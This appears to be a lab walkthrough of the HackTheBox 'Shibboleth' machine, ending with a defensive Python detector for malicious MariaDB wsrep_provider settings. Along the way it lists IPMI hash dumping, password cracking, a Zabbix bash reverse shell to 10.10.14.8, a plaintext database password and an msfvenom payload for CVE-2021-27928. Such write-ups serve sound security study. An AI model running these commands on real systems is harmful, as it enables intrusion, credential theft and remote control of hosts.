Multiple vulnerabilities.
There are so many things included; I spent many hours working on things that did not lead to flags.
Still, everything is enlightening.
00:30 feroxbuster
feroxbuster -u http://shibboleth.htb/ --force-recursion -C 404,405 -m GET,POST
00:48 wfuzz for sub domains
wfuzz -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hw 26
Added --hw 26, as there were too many "Word 26" responses.
01:06 Search for Bare Metal BMC automation
Restrict IPMI traffic to trusted internal networks. Traffic from IPMI (usually UDP port 623) should be restricted to a management VLAN segment with strong network controls. Scan for IPMI usage outside of the trusted network and monitor the trusted network for abnormal activity.
sudo nmap -sU -p 623 shibboleth.htb
01:28 IPMI version exploit with Metasploit
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
01:34 IPMI vulnerability
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > show actions
...actions...
msf auxiliary(ipmi_dumphashes) > set ACTION < action-name >
msf auxiliary(ipmi_dumphashes) > show options
...show and set options...
msf auxiliary(ipmi_dumphashes) > run
01:48 hashcat to crack password
hashcat hashed_pass.txt /usr/share/wordlists/rockyou.txt
02:15 Zabbix admin page. Found a command execution function.
03:16 reverse shell
system.run[bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1',nowait]
04:09 zabbix config file
cat zabbix_server.conf | grep -v "^#" | grep .
04:18 MariaDB version-related vulnerability (CVE-2021-27928)
mysql -u zabbix -pbloooarskybluh
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=9999 -f elf-so -o CVE-2021-27928.so
# Execute the payload
mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
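As an added defensive example, not part of these notes: a small detector that runs over MariaDB general query log lines and flags `SET GLOBAL wsrep_provider` statements pointing outside the directory where Galera provider libraries are expected to live, which is the tell-tale of the CVE-2021-27928 step above. The allow-listed directories, the log format assumed, and the sample log lines are my own assumptions and constructed data.

```python
import re

# Assumption: legitimate Galera provider libraries live only in these directories.
ALLOWED_PROVIDER_DIRS = ("/usr/lib/galera/", "/usr/lib64/galera/")

# Matches SET [GLOBAL|SESSION|@@global.|@@session.] wsrep_provider = <value>,
# with or without quotes around the value.
WSREP_SET_RE = re.compile(
    r"\bSET\s+(?:GLOBAL\s+|SESSION\s+|@@(?:global|session)\.)?wsrep_provider\s*=\s*"
    r"['\"]?([^'\";\s]+)",
    re.IGNORECASE,
)

def suspicious_provider(sql):
    """Return the provider path if the statement loads wsrep_provider from an
    unexpected location, otherwise None. Note that SET GLOBAL needs SUPER, so a
    hit from an application account also shows that account is over-privileged."""
    m = WSREP_SET_RE.search(sql)
    if not m:
        return None
    path = m.group(1)
    if path.lower() == "none":          # 'none' unloads the provider; benign
        return None
    if any(path.startswith(d) for d in ALLOWED_PROVIDER_DIRS):
        return None
    return path

# Assumed general query log shape: "<date> <time> <thread_id> Query <statement>"
LOG_LINE_RE = re.compile(r"^\S+\s+\S+\s+(\d+)\s+Query\s+(.*)$")

def scan_general_log(lines):
    """Yield (thread_id, provider_path) for every suspicious statement found."""
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        path = suspicious_provider(m.group(2))
        if path:
            yield int(m.group(1)), path

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    "211120 10:01:02     7 Query   SELECT itemid FROM items WHERE hostid=10084",
    "211120 10:01:09     9 Query   SET GLOBAL wsrep_provider='/usr/lib/galera/libgalera_smm.so'",
    "211120 10:01:15     9 Query   SET GLOBAL wsrep_provider=\"/tmp/CVE-2021-27928.so\"",
    "211120 10:01:20    11 Query   set @@global.wsrep_provider = '/dev/shm/x.so'",
    "211120 10:01:25    11 Query   SET GLOBAL wsrep_provider='none'",
]

if __name__ == "__main__":
    for tid, path in scan_general_log(SAMPLE_LOG):
        print(f"thread {tid}: wsrep_provider set to unexpected path {path}")
```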